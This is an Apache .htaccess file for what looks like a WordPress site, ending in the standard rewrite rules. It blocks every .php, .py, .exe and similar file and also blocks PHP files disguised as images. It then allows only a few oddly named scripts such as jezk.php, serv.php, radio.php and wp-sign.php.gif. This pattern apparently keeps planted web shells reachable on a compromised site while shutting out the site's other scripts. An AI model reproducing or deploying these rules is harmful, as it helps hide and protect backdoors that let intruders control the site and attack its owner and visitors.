<FilesMatch "\.(php|phtml)\.(gif|jpg|jpeg|png)$">
 Order allow,deny
 Deny from all
</FilesMatch>

<FilesMatch ".(py|exe|php|shtml|phtml)$">
 Order allow,deny
 Deny from all
</FilesMatch>

<FilesMatch "^(includes.php|includes.php.gif|wp-sign.php|wp-sign.php.gif|jezk.php|radio.php|serv.php|index.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>